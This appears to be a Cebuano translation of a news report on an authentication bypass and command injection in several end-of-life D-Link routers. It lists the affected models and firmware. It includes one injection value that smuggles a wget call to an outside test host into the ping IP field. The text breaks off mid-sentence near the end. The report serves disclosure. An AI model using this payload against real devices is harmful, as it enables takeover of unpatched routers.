Sa D-Link wireless routers
Makapainteres, sumala sa mga nag-develop sa firmware, ang "ping_test" nga tawag kinahanglan ipatuman lamang pagkahuman sa pag-authenticate, apan sa tinuud kini gitawag sa bisan unsang kaso, bisan unsa pa ang pag-log in sa web interface. Sa partikular, kung gi-access ang script nga apply_sec.cgi ug gipasa ang parameter nga "action = ping_test", ang script nag-redirect sa panid sa pag-authenticate, apan sa samang higayon gihimo ang aksyon nga may kalabotan sa ping_test. Aron ipatuman ang code, laing kahuyangan ang gigamit sa ping_test mismo, nga nagtawag sa ping utility nga walay hustong pagsusi sa pagkahusto sa IP address nga gipadala alang sa pagsulay. Pananglitan, sa pagtawag sa wget utility ug pagbalhin sa mga resulta sa "echo 1234" nga sugo ngadto sa usa ka eksternal nga host, ipiho lang ang parameter "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Ang presensya sa kahuyang opisyal nga nakumpirma sa mosunod nga mga modelo:
- DIR-655 nga adunay firmware 3.02b05 o mas tigulang;
- DIR-866L nga adunay firmware 1.03b04 o mas tigulang;
- DIR-1565 nga adunay firmware 1.01 o mas tigulang;
- DIR-652 (walay kasayuran bahin sa problema nga bersyon sa firmware nga gihatag)
Ang panahon sa suporta alang niini nga mga modelo natapos na, busa ang D-Link
Kini sa ulahi nadiskobrehan nga ang kahuyang mao usab
Source: opennet.ru